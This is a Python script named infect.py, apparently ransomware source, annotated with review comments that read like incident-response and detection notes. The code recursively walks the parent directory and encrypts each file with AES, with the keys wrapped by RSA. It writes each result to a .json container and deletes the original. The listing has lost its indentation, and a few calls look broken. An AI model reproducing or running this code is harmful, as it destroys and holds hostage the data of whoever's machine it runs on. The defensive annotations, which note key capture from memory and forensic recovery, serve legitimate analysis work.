infect.py
from base64 import b64encode, b64decode
import os, json, requests, cryptools, constants
# Per-run key material, drawn once from the OS random source when the module loads.
# The lengths come from the project-local `constants` module; their values are not
# visible in this file.
# These are module-level values, so every file handled in one run shares the same
# HMAC key, AES key and IV.
# NOTE(review): for incident response this suggests that key material captured from
# the live process (memory acquisition before termination) would cover all files
# from that run — confirm against cryptools.
HMAC_KEY = os.urandom(constants.HMAC_KEY_LENGTH)
AES_KEY = os.urandom(constants.AES_KEY_LENGTH)
INITIALIZATION_VECTOR = os.urandom(constants.IV_LENGTH)
# Root of the directory walk: the parent of the current working directory, so the
# affected scope depends on where the script is launched from.
OUTSIDE_DIRECTORY = ".."
# RSA wrapper from the project-local cryptools module. How the public key is
# obtained is not shown here; `requests` is imported above but unused in the visible lines.
CIPHER = cryptools.RSAEncryptor()
# Symmetric step: pads `plaintext` with cryptools.pad, then runs it through a
# cryptools.FileEncryptor built from the module-level AES_KEY and INITIALIZATION_VECTOR.
# Returns the update() output followed by the finalize() output.
# The cipher mode and padding scheme are defined in the project-local cryptools
# module and cannot be determined from this file.
# NOTE(review): indentation was lost in this listing; the three lines below are the function body.
def AESEncrypt(plaintext):
# A new encryptor object is created per call, but with the same key and IV each time.
cipher = cryptools.FileEncryptor(AES_KEY, INITIALIZATION_VECTOR)
padded_text = cryptools.pad(plaintext)
return cipher.update(padded_text) + cipher.finalize()
# Asymmetric step: encrypts `plaintext` with the module-level RSA encryptor (CIPHER),
# using the padding object returned by cryptools.oaep().
# The only call site in this file passes AES_KEY + HMAC_KEY, so this acts as the
# key-wrapping step: only the holder of the matching private key can recover the
# per-run symmetric keys from the stored 'KEY' field.
# presumably OAEP padding, judging by the helper name — confirm in cryptools
def RSAEncrypt(plaintext):
return CIPHER.encrypt(
plaintext,
cryptools.oaep()
)
# Main routine, executed as soon as the script runs: walks OUTSIDE_DIRECTORY
# recursively and, for each eligible file, writes a JSON container holding the
# encrypted content next to it and then deletes the original.
# NOTE(review): indentation was lost in this listing; the nesting described in
# these comments is inferred from statement order — confirm against the original file.
#
# Observable behaviour for detection: one process reading many files in full,
# creating a sibling `.json` for each, and unlinking the source immediately after;
# each container carries exactly the keys IV, KEY, TAG, EXT and CIPHERTEXT with
# base64 values.
for current_directory, sub_directories, sub_files in os.walk(OUTSIDE_DIRECTORY):
# Directories whose path contains 'ransomware' (case-insensitive) are skipped,
# presumably to leave the tool's own directory untouched.
if 'ransomware' in current_directory.lower():
continue
for file in sub_files:
# Any name containing the substring 'json' is skipped. This covers the
# containers written below, so a second run does not re-process them.
if 'json' in file:
continue
# fileName: every dot-separated part except the last, joined with no separator
# (interior dots are dropped). ext: the last dot-separated part.
# NOTE(review): recovery caveat — different originals in one directory can map
# to the same container name (same stem with different extensions, or names
# without a dot), in which case a later container replaces an earlier one.
fileName = ''.join(file.split('.')[:-1])
ext = file.split('.')[-1]
# str.split always returns at least one element, and names ending in 'json'
# were already filtered above, so this guard appears to be redundant.
if len(file.split('.')) == 0 or file.endswith('json'):
continue
json_dict = dict()
# The whole file is read into memory in binary mode and encrypted in one call.
with open(os.path.join(current_directory, file), 'rb') as f:
ciphertext = AESEncrypt(f.read())
# Integrity tag computed over the ciphertext with HMAC_KEY; the exact
# construction lives in cryptools.HMAC and is not visible here.
tag = cryptools.HMAC(ciphertext, HMAC_KEY)
# The AES and HMAC keys are concatenated and RSA-wrapped. The inputs are the
# same module-level values for every file in the run.
encrypted_keys = RSAEncrypt(AES_KEY + HMAC_KEY)
# Container fields. The IV is stored unwrapped; the symmetric keys only in
# RSA-wrapped form. The original extension is kept in 'EXT'.
json_dict['IV'] = b64encode(INITIALIZATION_VECTOR)
json_dict['KEY'] = b64encode(encrypted_keys)
json_dict['TAG'] = b64encode(tag)
json_dict['EXT'] = b64encode(ext, 'utf-8')
json_dict['CIPHERTEXT'] = b64encode(ciphertext)
# The container is written as `<fileName>.json` in the same directory as the original.
with open(os.path.join(current_directory, fileName + '.json'), 'w') as json_file:
json.dump(json_dict, json_file)
# The original is removed with a plain unlink; no overwrite of its contents is
# visible in this file.
# NOTE(review): deleted content may therefore still be recoverable by forensic
# carving, depending on filesystem and storage — verify per case.
os.remove(os.path.join(current_directory, file))